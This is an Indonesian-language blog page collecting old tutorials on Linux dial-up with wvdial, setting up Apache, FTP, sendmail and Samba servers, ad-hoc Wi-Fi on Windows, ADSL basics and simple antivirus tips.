[root@masaji /root]# wvdial 1--> WvDial: Internet dialer version 1.40--> Initializing modem.--> Sending: ATZATZOK--> Sending: ATQ0 V1 E1 S0=0 &C1 &D2 S11=55 +FCLASS=0ATQ0 V1 E1 S0=0 &C1 &D2 S11=55 +FCLASS=0OK--> Sending: ATM0ATM0OK--> Modem initialized.--> Sending: ATDT 564647--> Waiting for carrier.ATDT 564647CONNECT 115200--> Carrier detected. Waiting for prompt.login:--> Looks like a login prompt.--> Sending: usernyausernyaPassword:--> Looks like a password prompt.--> Sending: (password)Last login: Wed May 31 23:34:56 on ttyS0~[7f]}#@!}!}!} }4}"}&} } } } }%}&@}=+}'}"}(}0C~--> PPP negotiation detected.--> Starting pppd at Wed May 31 23:31:45 2000
Pada konsol tempat anda melakukan atau mengeksekusi wvdial tersebut akan terhenti seperti yang tertulis diatas, dan tidak akan kembali ke shell karena program berjalan pada latar depan. Jika anda ingin mengakhiri sesi wvdial tersebut anda tinggal menekan kombinasi tombol Ctrl-C sehingga tampilannya akan kurang lebih seperti :
Caught signal #2! Attempting to exit gracefully...--> Disconnecting at Wed May 31 23:32:07 2000[root@masaji /root]#
Dan anda kembali lagi ke shell. Jika anda ingin agar konsol tersebut tetap bisa digunakan anda dapat menjalankan program ini pada proses latar belakang yaitu dengan menambahkan '&' pada akhir perintah. Untuk mengakhirinya anda tidak dapat lagi menggunakan Ctrl-C, melainkan anda harus mematikan proses wvdial dengan menggunakan perintah kill. Setelah anda mengakhiri sesi wvdial ini, anda dapat membaca tentang berapa lama anda terkoneksi dan berapa besar data yang di transfer baik keluar maupun masuk selama anda terhubung anda dapat membacanya pada file /var/log/messages.

Membuat Server Web
Server web berfungsi banyak, salah satu fungsinya adalah memberikan informasi kepada orang yang mengakses kedalamnya. Server web selain berfungsi untuk internet, juga bisa berfungsi sebagai intranet, yang akan menjembatani komunikasi antar anggota dalam jaringan tersebut.

Cara Pembuatan Server Web
Untuk membuat server web, anda membutuhkan program apache yang bisa anda download di http://www.apache.org/. Untuk instalasinya ada dua cara:

Jika anda mendownload versi binernya, ketikkan perintah sebagai berikut:

root@masaji:/tmp $> rpm -ivh apache_1.3.19-i386.rpm

Jika anda mendownload versi source-code, ketikkan perintah sebagai berikut:

root@masaji:/tmp $> tar -zxvf apache_1.3.19.tar.gz

Kemudian, lanjutkan dengan prosedur instalasi selanjutnya:
root@masaji:/tmp/apache_1.3.19 $> ./configure --prefix=PREFIXroot@masaji:/tmp/apache_1.3.19 $> makeroot@masaji:/tmp/apache_1.3.19 $> make install
Pada instalasi di atas, kata PREFIX bisa anda ganti dengan directory dimana anda akan menempatkan apache.

Setting Apache
Untuk melakukan setting apache, anda cari file conf/httpd.conf dan file conf/srm.conf. Pada SuSE, bisa anda temukan konfigurasinya di /etc/httpd/httpd.conf dan /etc/httpd/srm.conf. Selanjutnya lakukan setting konfigurasi pada file conf/httpd.conf, dengan contoh sebagai berikut:
### Section 1: Global EnvironmentServerType standaloneServerRoot "/usr/local/httpd"PidFile /usr/local/apache/logs/httpd.pidScoreBoardFile /usr/local/apache/logs/httpd.scoreboardTimeout 300KeepAlive OnMaxKeepAliveRequests 100KeepAliveTimeout 15MinSpareServers 5MaxSpareServers 10StartServers 3MaxClients 150MaxRequestsPerChild 0BindAddress * # Dynamic Shared Object (DSO) SupportLoadModule vhost_alias_module libexec/mod_vhost_alias.soLoadModule env_module libexec/mod_env.soLoadModule config_log_module libexec/mod_log_config.soLoadModule mime_magic_module libexec/mod_mime_magic.soLoadModule mime_module libexec/mod_mime.soLoadModule negotiation_module libexec/mod_negotiation.soLoadModule status_module libexec/mod_status.soLoadModule info_module libexec/mod_info.soLoadModule includes_module libexec/mod_include.soLoadModule autoindex_module libexec/mod_autoindex.soLoadModule dir_module libexec/mod_dir.soLoadModule cgi_module libexec/mod_cgi.soLoadModule asis_module libexec/mod_asis.soLoadModule imap_module libexec/mod_imap.soLoadModule action_module libexec/mod_actions.soLoadModule speling_module libexec/mod_speling.soLoadModule userdir_module libexec/mod_userdir.soLoadModule alias_module libexec/mod_alias.soLoadModule rewrite_module libexec/mod_rewrite.soLoadModule access_module libexec/mod_access.soLoadModule auth_module libexec/mod_auth.soLoadModule anon_auth_module libexec/mod_auth_anon.soLoadModule dbm_auth_module libexec/mod_auth_dbm.soLoadModule digest_module libexec/mod_digest.soLoadModule proxy_module libexec/libproxy.soLoadModule cern_meta_module libexec/mod_cern_meta.soLoadModule expires_module libexec/mod_expires.soLoadModule headers_module libexec/mod_headers.soLoadModule usertrack_module libexec/mod_usertrack.soLoadModule unique_id_module libexec/mod_unique_id.soLoadModule setenvif_module libexec/mod_setenvif.so#LoadModule perl_module libexec/libperl.soLoadModule php4_module libexec/libphp4.so ClearModuleListAddModule mod_vhost_alias.cAddModule mod_env.cAddModule mod_log_config.cAddModule mod_mime_magic.cAddModule mod_mime.cAddModule mod_negotiation.cAddModule mod_status.cAddModule mod_info.cAddModule mod_include.cAddModule mod_autoindex.cAddModule mod_dir.cAddModule mod_cgi.cAddModule mod_asis.cAddModule mod_imap.cAddModule mod_actions.cAddModule mod_speling.cAddModule mod_userdir.cAddModule mod_alias.cAddModule mod_rewrite.cAddModule mod_access.cAddModule mod_auth.cAddModule mod_auth_anon.cAddModule mod_auth_dbm.cAddModule mod_digest.cAddModule mod_proxy.cAddModule mod_cern_meta.cAddModule mod_expires.cAddModule mod_headers.cAddModule mod_usertrack.cAddModule mod_unique_id.cAddModule mod_so.cAddModule mod_setenvif.c#AddModule mod_perl.cAddModule mod_php4.c ExtendedStatus On ### Section 2: 'Main' server configurationPort 80User wwwrunGroup nogroupServerAdmin
masaji@masaji.netThis email address is being protected from spam bots, you need Javascript enabled to view itServerName server.netDocumentRoot "/usr/local/httpd/htdocs" Options FollowSymLinks AllowOverride None Options Indexes FollowSymLinks MultiViews AllowOverride None Order allow,deny Allow from all UserDir public_html DirectoryIndex index.html index.php AccessFileName .htaccess Order allow,deny Deny from all UseCanonicalName On TypesConfig /etc/apache/mime.types DefaultType text/plain MIMEMagicFile /etc/apache/magic HostnameLookups OffErrorLog /var/log/httpd/error_logLogLevel warnLogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combinedLogFormat "%h %l %u %t \"%r\" %>s %b" commonLogFormat "%{Referer}i -> %U" refererLogFormat "%{User-agent}i" agentCustomLog /var/log/httpd/access_log commonServerSignature On Alias /icons/ "/usr/local/httpd/icons/" Options Indexes MultiViews AllowOverride None Order allow,deny Allow from all ScriptAlias /cgi-bin/ "/usr/local/httpd/cgi-bin/" AllowOverride None Options None Order allow,deny Allow from all IndexOptions FancyIndexing AddIconByEncoding (CMP,/icons/compressed.gif) x-compress x-gzip AddIconByType (TXT,/icons/text.gif) text/* AddIconByType (IMG,/icons/image2.gif) image/* AddIconByType (SND,/icons/sound2.gif) audio/* AddIconByType (VID,/icons/movie.gif) video/* AddIcon /icons/binary.gif .bin .exe AddIcon /icons/binhex.gif .hqx AddIcon /icons/tar.gif .tar AddIcon /icons/world2.gif .wrl .wrl.gz .vrml .vrm .iv AddIcon /icons/compressed.gif .Z .z .tgz .gz .zip AddIcon /icons/a.gif .ps .ai .eps AddIcon /icons/layout.gif .html .shtml .htm .pdf AddIcon /icons/text.gif .txt AddIcon /icons/c.gif .c AddIcon /icons/p.gif .pl .py AddIcon /icons/f.gif .for AddIcon /icons/dvi.gif .dvi AddIcon /icons/uuencoded.gif .uu AddIcon /icons/script.gif .conf .sh .shar .csh .ksh .tcl AddIcon /icons/tex.gif .tex AddIcon /icons/bomb.gif core AddIcon /icons/back.gif .. AddIcon /icons/hand.right.gif README AddIcon /icons/folder.gif ^^DIRECTORY^^ AddIcon /icons/blank.gif ^^BLANKICON^^ DefaultIcon /icons/unknown.gif ReadmeName README HeaderName HEADER IndexIgnore .??* *~ *# HEADER* README* RCS CVS *,v *,t AddEncoding x-compress Z AddEncoding x-gzip gz tgz AddLanguage da .dk AddLanguage nl .nl AddLanguage en .en AddLanguage et .ee AddLanguage fr .fr AddLanguage de .de AddLanguage el .el AddLanguage he .he AddCharset ISO-8859-8 .iso8859-8 AddLanguage it .it AddLanguage ja .ja AddCharset ISO-2022-JP .jis AddLanguage kr .kr AddCharset ISO-2022-KR .iso-kr AddLanguage no .no AddLanguage pl .po AddCharset ISO-8859-2 .iso-pl AddLanguage pt .pt AddLanguage pt-br .pt-br AddLanguage ltz .lu AddLanguage ca .ca AddLanguage es .es AddLanguage sv .se AddLanguage cz .cz AddLanguage ru .ru AddLanguage tw .tw AddCharset Big5 .Big5 .big5 AddCharset WINDOWS-1251 .cp-1251 AddCharset CP866 .cp866 AddCharset ISO-8859-5 .iso-ru AddCharset KOI8-R .koi8-r AddCharset UCS-2 .ucs2 AddCharset UCS-4 .ucs4 AddCharset UTF-8 .utf8 LanguagePriority en da nl et fr de el it ja kr no pl pt pt-br ru ltz ca es sv tw AddType application/x-httpd-php .php #AddType application/x-httpd-php-source .phps AddType application/x-tar .tgz BrowserMatch "Mozilla/2" nokeepalive BrowserMatch "MSIE 4\.0b2;" nokeepalive downgrade-1.0 force-response-1.0 BrowserMatch "RealPlayer 4\.0" force-response-1.0 BrowserMatch "Java/1\.0" force-response-1.0 BrowserMatch "JDK/1\.0" force-response-1.0 ### Section 3: Virtual HostsNameVirtualHost home.masaji.net ServerAdmin
masaji@home.masajiThis email address is being protected from spam bots, you need Javascript enabled to view it DocumentRoot /home/masaji/www ServerName home.masaji.net ErrorLog /var/log/apache/home.masaji.net/error.log CustomLog /var/log/apache/home.masaji.net/access.log common

Untuk file srm.conf tidak usah dirubah, kecuali anda ingin menambahkan modul-modul tambahan seperti php. Selantnya, untuk menjalankan apache, ketikkan perintah berikut ini:

root@masaji:/tmp $> PREFIX/bin/apachectl start

Untuk penjelasan fungsi yang ada pada file httpd.conf anda bisa membacanya di buku "Apache Web Server". Sampai di sini server web yang anda buat sudah bisa anda akses secara intranet melalui komputer klien. Tentunya untuk menambahkan fasilitas yang macam-macam anda perlu membuatkan program html dan cgi serta php kedalamnya.

Setting Server FTP
Server FTP berguna untuk men-download suatu program ataupun data dari server oleh klien. Yang akan dibahas di sini adalah pembuatan server FTP secara intranet.

Secara default program ftp, biasanya wu.ftp sudah disertakan pada saat instalasi Linux. Pada saat ini, sudah ada program ftp terbaru yaitu proftpd, yang diinformasikan lebih amand dari pada pendahulunya. Dimana jika tidak aktivitas selama sekian menit, maka secara otomatis akan terputus koneksinya dengan sendirinya.

Jika program ftp sudah terpasang pada komputer anda, langkah berikutnya adalah mengaktifkan ftp, dengan cara:

Melakukan editing pada file /etc/inetd.conf
Penulis mengasumsikan anda menggunakan program inetd, contoh skripnya adalah sebagai berikut:
# FTP Server ftp stream tcp nowait root /usr/sbin/tcpd wu.ftpd -a# ftp stream tcp nowait root /usr/sbin/tcpd proftpd# ftp stream tcp nowait root /usr/sbin/tcpd in.ftpd
Pada skrip di atas, hilangkan tanda pagar pada kalimat ftp stream tcp nowait root /usr/sbin/tcpd wu.ftpd -a
. Sehingga program ftpd akan diaktifkan pada saat komputer dinyalakan.
Melakukan Editing pada /etc/services
Lakukan editing pada file /etc/services, dengan cara hilangkan tanda # pada baris yang berisikan ftp. Seperti contoh berikut ini:
ftp-data 20/tcp # File Transfer [Default Data]ftp-data 20/udp # File Transfer [Default Data]ftp 21/tcp # File Transfer [Control]ftp 21/udp # UDP File Transfer
Tindakan tersebut di atas berfungsi agar port ftp terbuka, sehingga bisa diakses untuk umum.

Sampai di sini. program ftp sudah bisa berjalan dan siap digunakan. Untuk tindakan pengamanan, salinlah skrip berikut ini ke directory /etc dengan nama ftpusers dan securetty. Berikut adalah skrip dari ftpusers dan securetty:
# file /etc/ftpusers:adabasamandaatbincyrusdaemondbmakerdb2fenc1db2inst1db2asempressfaxfirewallfnetgamesgdmgnatsircinformixixesslnxlpmanmdommysqlnamednewsnobodynpspostfixpostgresrootskyrixuucpvirtuosoyard# End. ------------------------------- #file /etc/securetty:tty1tty2tty3tty4tty5tty6# for devfs:vc/1vc/2vc/3vc/4vc/5vc/6
Membuat Server Mail
Server mail berfungsi untuk administrasi email anda, baik yang masuk maupun keluar (sending & receive email). Keuntungan dari server mail ini adalah, bila anda mengirimkan attachment yang berukuran besar, misalnya 1 Mbs tidak menjadi masalah karena akan dikirimkan dalam waktu kurang dari satu menit. Keuntungan lainnya adalah anda tidak perlu antri di ISP, karena email anda langsung terkirim ke alamat tujuan pada server mail alamat yang dituju. Selain itu anda bisa melakukan filtering untuk memisah-misahkan alamat email kepada klien secara otomatis. Kerugiannya adalah orang yang anda kirimi biasanya ngomel karena dikirimi attachment yang besar-besar :).

Untuk membuat server mail, kita membutuhkan aplikasi sendmail yang biasanya sudah masuk di dalam paket instalasi Linux semua distribusi.

Menjalankan Sendmail sebagai Daemon
Secara default pada semua distro, sendmail berjalan secara otomatis pada saat komputer dinyalakan. Untuk melihat status sendmail, sudah aktif atau belum, anda bisa ketikkan perintah:
root@masaji:/home/masaji $> /etc/rc.d/init.d/sendmail statusChecking for service sendmail: OK
Administrasi Sendmail
Untuk menjalankan sendmail secara otomatis pada sat komputer dinyalakan, anda harus menempatkan file sendmail di:

Untuk distro SuSE, ada di:/etc/rc.d/init.d/sendmail

Untuk distro Slackware, ada di lokasi:/etc/rc.d/rc.M/sendmail

Untuk distro RedHat, menempati lokasi yang sama dengan SuSE, yaitu di lokasi:/etc/rc.d/init.d/sendmail

Berikut ini, isi skrip sendmail yang ada pada distro SuSE:
#! /bin/sh# Copyright (c) 1996-99 SuSE Gmbh Nuernberg, Germany.## Author: Florian La Roche, 1996, 1997# Werner Fink <
werner@suse.deThis email address is being protected from spam bots, you need Javascript enabled to view it>, 1996, 1999# . /etc/rc.config test -s /etc/rc.config.d/sendmail.rc.config && \ . /etc/rc.config.d/sendmail.rc.config # Determine the base and follow a runlevel link name.base=${0##*/}link=${base#*[SK][0-9][0-9]} # Force execution if not called by a runlevel directory.test $link = $base && SMTP=yestest "$SMTP" = yes exit 0 if test -z "$SENDMAIL_ARGS" ; then SENDMAIL_ARGS="-bd -q30m -om"fi # The echo return value for success (defined in /etc/rc.config).return=$rc_donecase "$1" in start) echo -n "Initializing SMTP port. (sendmail)" startproc /usr/sbin/sendmail $SENDMAIL_ARGS return=$rc_failed echo -e "$return" ;; stop) echo -n "Shutting down SMTP port:" killproc -TERM /usr/sbin/sendmail return=$rc_failed echo -e "$return" ;; restart) $0 stop && $0 start return=$rc_failed ;; reload) echo -n "Reload service sendmail" killproc -HUP /usr/sbin/sendmail return=$rc_failed echo -e "$return" ;; status) echo -n "Checking for service sendmail: " checkproc /usr/sbin/sendmail && echo OK echo No process ;; *) echo "Usage: $0 {startstopstatusrestartreload}" exit 1esac # Inform the caller not only verbosely and set an exit status.test "$return" = "$rc_done" exit 1exit 0
Pada dasarnya, administrasi sendmail berisikan 3 hal utama, antara lain:

Mendefinisikan lingkungan sendmail
Menuliskan kembali alamat-alamat pada sintaks yang tepat untuk mail penerima
Memetakan alamat-alamat kepada instruksi untuk pengiriman email
Bagi anda pemula, jangan takut dengan skrip di atas, karena secara default system sudah menyertakan skrip tersebut sesuai dengan konfigurasi sistem anda. Untuk pengaturan administrasinya, anda bisa mengedit file /etc/rc.d/init.d/sendmail. Misalnya:
# Force execution if not called by a runlevel directory.test $link = $base && SMTP=yestest "$SMTP" = yes exit 0 if test -z "$SENDMAIL_ARGS" ; then SENDMAIL_ARGS="-bd -q30m -om"fi
Pada kalimat SENDMAIL_ARGS="-bd -q30m -om", mengartikan bahwa email akan dikirim setiap 30 menit. Skrip ini bisa anda ganti dengan 1h untuk satu jam, atau 10m utnuk setiap 10 menit.

Penggunaan Sendmail
Untuk menggunakan sendmail dalam pengiriman smtp maupun pop, caranya adalah sebagai berikut:

Untuk melihat status dari sendmail, ketikkan perintah berikut ini: · root@masaji:~ $> /etc/rc.d/init.d/sendmail status· Checking for service sendmail: OK· root@masaji:~ $>
Untuk menjalankan sendmail bukan sebagi daemon, ketikkan perintah: · root@masaji~$> /etc/rc.d/init.d/sendmail
Pada Kmail:

buka: File - Settings - Network.
Kemudian klik Sendmail.
Pada Location:, isikan /usr/sbin/sendmail
Untuk pop pada server, terserah kepada masing-masing mail server ISP yang bersangkutan.

Untuk klien Windows dengan Outlook Express, prosedurnya adalah sebagai berikut:

Klik Tools - Accounts - Mail - add - Mail.
Pada bagian Email Server Names - Incoming mail (POP3, IMAP or HTTP) server, isikan nama server Linux untuk POP3. Misalnya 192.168.1.1
Pada Outgoing mail (SMTP) server, ketikkan: mail.server.net
sampai di sini, pembuatan server mail sudah selesai, jika ingin menambahkan fasilitas lainnya anda bisa menemukannya di

Membuat Samba Server
Samba Server berfungsi sebagai jembatan yang dapat mengatasi masalah komunikasi antar jaringan, baik yang satu keluarga Unix maupun yang berbeda platform, misalnya antara Linux/Unix dengan MS Windows. Maupun antara Linux/Unix dengan platform yang lain, misalnya: Apple Mac OS, Amiga, dan lain-lainnya.

Pada artikel ini, kita akan membahas mengenai penggunaan Samba dalam pembuatan file server. Pembahasan ini berdasarkan asumsi, bahwa masih banyak komputer klien yang menggunakan platform Windows. Sedangkan kita tahu bahwa platform Windows berbeda dengan Linux/Unix dalam banyak hal, antara lain komunikasi jaringan. Perbedaan ini dikarenakan:

Microsoft menerapkan protokol SMB, yang diberi nama CIFS (Common Internet file System.
Dalam membatasi lingkungannya diterapkan Window domain, merupakan sekumpulan worstation yang menjalankan protokol SMB.
Dalam satu domain, ada sebuah domain controller, dimana setiap Domain Controller menggunaakan Security Account Manager (SAM), untuk meyimpan daftar kombinasi username dan password.
Sebuah domain bisa mempunyai lebih dari satu domain controller.
Primary Domain Controller (PDC), merupakan domain controller yang memberikan pelayanan sehari-hari. PDC ini bekerja sama dengan Back Up Domain Controller (BDC) melakukan sinkronisasi Security Account Manager (SAM). Sehingga bilamana terjadi PDC mengalami crash, tugasnya akan segera digantikan oleh BDC.
Beberapa keuntungan program Samba, antara lain:

Sharing (penggunaan secara bersama-sama) data & file antara server Linux dengan klien Windows, sebaik kita menggunakan Network Neighborhood pada Windows.
Sharing data & file antar sesama mesin Linux
sharing printer Linux dengan mesin Windows.
Sharing printer Windows dengan mesin Linux.
Instalasi Samba
Berikut ini, langkah-langkah yang akan kita jalankan untuk melakukan instalasi program Samba:

Download Samba
Anda bisa melakukan download Samba di http://www.samba.org/. File yang akan kita ambil adalah: samba-versi terkini-i386.tar.gz. Aplikasi Samba yang penulis miliki adalah: samba-2.0.7-51-i386.tar.gz

Ekstraksi Samba
Untuk melakukan ekstraksi samba, ketikkan perintah:

tar -zxvf samba-2.0.7-51-i386.tar.gz

Konfigurasi Samba
Untuk konfigurasi Samba, anda login sebagai root, kemudian ketikkan perintah di bawah ini:
root@masaji:/tmp/samba-2.0.7-51 $> ./configureroot@masaji:/tmp/samba-2.0.7-51 $> makeroot@masaji:/tmp/samba-2.0.7-51 $> make install
Administrasi lewat Swat
Jika Samba sudah terinstalasi dengan baik, langkah selanjutnya adalah mengaktifkan SWAT, untuk membantu pengaturan administrasi Samba. Fasilitas yang ada pada SWAT , antara lain adalah:

Mempermudah dalam editing administrasi Samba.
Dokumnetasi yang lengkap dengan petunjuk link.
Menampilkan status sharing file
Menjalankan, mematikan dan menjalankan ulan (restart) Samba daemon (smbd & nmbd).
Pengaturan resource yang akan di-share
Untuk mengaktifkan SWAT, hapuslah tanda # pada file /etc/inetd.conf, seperti tampak di bawah ini:
# swat is the Samba Web Administration Toolswat stream tcp nowait.400 root /usr/sbin/swat swat
Administrasi Samba
Untuk melakukan administrasi Samba, anda bisa mengedit file /etc/smb.conf, seperti tampak di bawah ini:
# /etc/smb.conf[global] workgroup = arbeitsgruppe guest account = nobody keep alive = 30 os level = 2 kernel oplocks = false security = user printing = bsd printcap name = /etc/printcap load printers = yes socket options = TCP_NODELAY map to guest = Bad User wins support = no [homes] comment = Heimatverzeichnis browseable = no read only = no create mode = 0750 [printers] comment = All Printers browseable = no printable = yes public = no read only = yes create mode = 0700 directory = /tmp
Untuk melakukan editing, ada dua cara:

Melakukan editing secara manual, dengan menggunakan teks editor yang ada, atau
Menggunakan program bantu bernama SWAT, dengan cara ketikkan perintah di bawah ini pada browser, seperti tampak pada gambar berikut:
Pastikan sebelumnya, anda sudah mempunyai account di server Linux, karena bila tidak, maka tidak akan bisa bergabung dengan server Linux. Selanjutnya akan muncul kotak dialog yang akan menanyakan nama user dan password anda. Ketikkan dengan benar, dan anda siap berbagi data, file dan printer dengan server Linux.

Membuat Home Networking dengan Wi-Fi

Anda dapat membuat jaringan rumah atau kantor kecil tanpa menggunakan access point atau hub/router. Seperti halnya jaringan peerto-peer pada jaringan yang menggunakan NIC. Tidak hanya itu, jaringan peer-to-peer dengan Wi-Fi dapat dilakukan dengan lebih dari dua komputer dan dengan kecepatan yang jauh lebih besar.
1. Aktifkan Wi-Fi AndaLangkah pertama yang paling penting adalah mempersiapkan perangkat jaringan wireless Anda dan mengaktifkannya. Cara mengaktifkan fitur Wi-Fi pada setiap komputer cukup beragam. Ada yang harus menekan tombol khusus baru kemudian aktif. Ada juga yang cukup mengaktifkannya melalui layar Windows Anda. Untuk mengaktifkannya melalui layar monitor; buka Control Panel, Network Connection, pada icon Wireless Network Connection klik kanan dan pilih Enable. Setelah itu, klik kanan kembali dan pilih View Available Wireless Network. Jika pada layar ada sebuah koneksi wireless tersedia, Anda tinggal pilih kemudian tekan tombol Connect.
2. Buat Jaringan Wi-Fi SendiriNamun bila koneksi Wi-Fi belum tersedia, Anda memang harus membuatnya sendiri. Apalagi pada komputer pertama sekali yang akan digunakan untuk jaringan. Caranya cukup pergi ke Control Panel, pilih Network Connection. Kemudian pada halaman NetworkConnection pilih Wireless Network Connection. Klik kanan kemudian pilih Properties. Setelah itu, buka halaman Wireless Network. Pada halaman ini berikan tanda centang pada Use Windows to configure my wireless network settings. Kemudian tekan tombol Add di bagian Prefered Networks.
3. Namakan KoneksiLangkah kedua adalah menamakan koneksi wireless yang akan Anda buat. Nama koneksi dapat terserah diberikan, pengetikan nama koneksi dilakukan dalam boks SSID. Jika Anda ingin memiliki password untuk jaringan ini, pada opsi The key is provided for me automatically hapus tanda centang. Kemudian pada drop down menu Network Authentication, pilih Open atau Shared untuk menggunakan network key WEP atau memilih WPA-None untuk memilih menggunakan network key WPA. WPA memang lebih baik, namun tidak semua perangkat mendukungnya. Kemudian masukkan kuncinya pada kolom Network key dan Confirm network key.
4. Berikan Password WEPBila Anda memilih untuk memberikan password atau key secara manual, maka pada layar selanjutnya Anda akan dipertanyakan password tersebut. Bila Anda menggunakan password WEP (Wired Equivalent Privacy) ada aturan penggunaannya, yaitu hanya diperbolehkan 5 atau 13 karakter untuk penulisan password yang hanya menggunakan 1 jenis karakter. Untuk dua jenis karakter (angka dan huruf) hanya diperbolehkan sebanyak 10 atau 26 karakter. Perlu diingat bahwa semakin panjang dan rumit password akan semakin baik.
5. Berikan Password WPAAnda dapat juga memberikan password WPA (Wi-Fi Protected Access). Pada penggunaan password WPA aturan yang harus ditaati adalah jumlah karakter yang dapat digunakan antara 8 sampai 63 untuk satu jenis karakter dan 64 karakter untuk lebih dari satu jenis karakter. Setelah selesai nanti, Anda dapat mencetak password ini untuk kemudian digunakan menambah komputer ke dalam jaringan nantinya. Dan perlu diingatkan bahwa penggunaan kunci WPA tidak selalu dapat diterapkan di setiap komputer. Ada beberapa perangkat jaringan nirkabel yang tidak dapat menerima kunci WPA.
6. Ad HocSatu lagi yang perlu dilakukan adalah menjadikannya jaringan Ad Hoc. Jaringan Ad Hoc adalah jaringan yang hanya menghubungkan komputer ke komputer tanpa melalui sebuah hub atau router sebagai access point. Untuk jaringan nirkabel rumahan atau kantor kecil cukup menggunakan jaringan jenis ini. Oleh sebab itu, salah satu yang tidak boleh dilewatkan adalah memberikan tanda centang pada opsi This is a computer-to-computer (ad-hoc) network, wireless access points are not used. Opsi ini terletak di bagian paling bawah layar Association. Setelah selesai tekan OK.
7. Mulai Buat Jaringan BaruLangkah selajutnya adalah membuat jaringan baru menggunakan koneksi yang sudah ada. Langkah pertama dalam membuat jaringan Anda cukup mengikuti wizard yang ada untuk membuat jaringan biasa. caranya masuk ke Control Panel. Kemudian pilih Network Setup Wizard. Ikuti petunjuk yang diberikan. Pada saat wizard mulai dijalankan, Anda akan diminta untuk memeriksa kembali perangkat jaringan yang akan digunakan. Apakah sudah lengkap atau belum. Jika sudah lengkap Anda dapat melanjutkan. Jika belum pastikan terlebih dahulu semua perangkat sudah terpasang dan terinstal dengan baik.


Tips n Trik WLAN

Tips n Trik Seputar WLAN
1. Untuk memperluas jangkauan Wireless Access Point/Wireless Adapter, kita dapat mengganti antena standart dengan antena yang memiliki kemampuan lebih baik, atau antena yang memiliki jarak jangkauan lebih jauh . Pernah Nonton E_life Style MetroTv yang waktu itu Kang Onno Purbo mempraktekkan tentang wajan bolik nah itu salah satu trik yang luar biasa udah kualitasnya oke harganya Oke pula tuh.2. Sistem Keamanan jaringan kudu oke juga, jangan mentang2 dah make teknologi wireless keamanaannya di cuekin, bisa make fitur SSID dan MAC untuk filterisasi pengalamatan aja.
3. Menjaga kualitas transfer datanya, ya banyak seeh caranya bisa peletakan access Point yang tepat (tengah2 User). Ingat jangan APnya di taruh di tempat yang terlidungi dengan beton atau apa gitu ntar koneksinya malah lelet lagi.
4. Ingat Channelpada access point jgn berdekatan dengan channel AP lainnya bisa terjadi overlapping channel.
5. Agar koneksi per client/User sama maka harus adil membagi quotanya, bisa menggunakan router tapi sekarang dah ada Ap yang memiliki fitur router ya itung2 simple n hemat gitu deh.

Apa Itu ADSL
July 1st, 2007 ADSL none Comments
Asymmetric Digital Subscriber Line disingkat ADSL adalah salah satu bentuk Digital Subscriber Line, suatu teknologi komunikasi data yang memungkinkan transmisi data yang lebih cepat melalui kabel tembaga telepon biasa dibandingkan dengan modem konvensional yang ada.
Karakter yang membedakan ADSL dari xDSL adalah aliran kapasitas data dari satu arah lebih besar daripada arah yang lain atau disebut juga asimetris. Para penyelenggara biasanya memasarkan ADSL sebagai bentuk layanan untuk orang-orang yang berhubungan dengan Internet relatif lebih pasif, yang menginginkan download dari Internet tetapi tidak begitu memerlukan untuk menjalankan server yang tentu saja sangat memerlukan lebar pita yang besar dari segala arah.Ada dua macam alasan, yaitu teknis dan pemasaran, mengapa ADSL di banyak tempat paling banyak ditawarkan ke pengguna rumahan. Dari sisi teknis, sepertinya ada banyak crosstalk dari sirkuit yang berada di ujung lain letak Digital subscriber line access multiplexer (DSLAM) (di mana biasanya banyak local loop berdekatan menjadi satu) melebihi yang diinginkan pelanggan. Tentunya, sinyal upload terlemah berada pada bagian terbising pada local loop. Itulah yang meyebabkan mengapa dari sisi teknis laju transimisi tampak lebih tinggi dibandingkan dengan laju modem milik pelanggan.
Untuk ADSL konvensional, rata-rata laju downstream dimulai pada 256 kbit/s dan umumnya dapat mencapai 8 Mbit/s pada jarak 1,5 km (5000 ft) dari kantor sentral yang dilengkapi DSLAM atau remote terminal. Rata-rata laju upstream dimulai pada 64 kbit/s dan umumnya dapat mencapai 256 kbit/s dan kadang dapat pula melaju sampai 1024 kbit/s. Nama ADSL Lite biasanya digunakan untuk versi yang lebih lambat.
Sumber : http://id.wikipedia.org/wiki/ADSL

Tips Mengamankan Komputer
June 23rd, 2007 G-Tips 1 Comments


Tips Mengamankan Komputer dari Virus dan Trojan
Komputer tanpa virus mustahil, karena perkembangan virus selalu lebih maju dari pada anti virusnya (virus doloe baru anti virus ‘tul nggak) so…. Selalu virus lebih maju selangkah dari pada anti virus. Pada umunya algoritma virus hamper sama semua hanya saja spesifikasinya berbeda, ada yang menyerang ke file dan ada yang menyerangnya ke system operasi, bagaimana dengan virus2 lokal, nah untuk firus local pun demikian ada yang menterang ke MBR ada yang ke system di windows ada juga yang nyerang ke file2 tertentu aja yang intinya hanya satu yakni mengganggu kenyamanan aja seh.
Seiring perkembangan virus maka para vendor anti virus terus maju dan lebih kreatif dengan bermodal pengalaman banyak dari mereka membuat software anti virus berdasarkan jenis dan karakter2 dari virus namun tdk ada yang dapat menjamin suatu software anti virus dapat melindungi computer dari serangan virus jadi kita sebagai userpun harus lebih hati2 dalam menggunakan computer berikut beberapa tips dalam menjaga computer anda agar tdk mudah terserang virus.
GTips (Gaptek Tips)
1. Gunakan anti virus, dan secara periodic lakukan update agar jika terdapat virus2 baru dapat di kenali dan di identifikasi olehnya sangat di sarankan agar anda menggunakan software anti virus.2. Batasi penggunakan Floopy Disk Drive, USB Disk Drive dan akses Internet (Browsing, Attch File, Chating dengan bot script. Sebab paling sering di jumpai penyebaran virus melalui disket dan USB Drive serta file2 attch.3. Waspada dalam melakukan instalasi pada program2 freeware dengan iming2 program gratis, sebab sangat rentan akan penyusupan virus pada program2 gratisan.4. Lakukan Scaning berkala pada Harddisk anda.5. kenali benar Windows atau Operating system sebab saat ini computer local sering terinfeksi virus dikarenakan banyak user yang belum paham benar semisal karakter2 file atau system yang mulai aneh hal ini bias saja diakibatkan oleh virus.6. Waspada pada file2 aneh seperti File executable tapi berbentuk folder, file attch email yang di minta merename dan menjalankannya, dsb.












Apa Itu HSDPA ???
August 26th, 2007 Jaringan Komputer none Comments


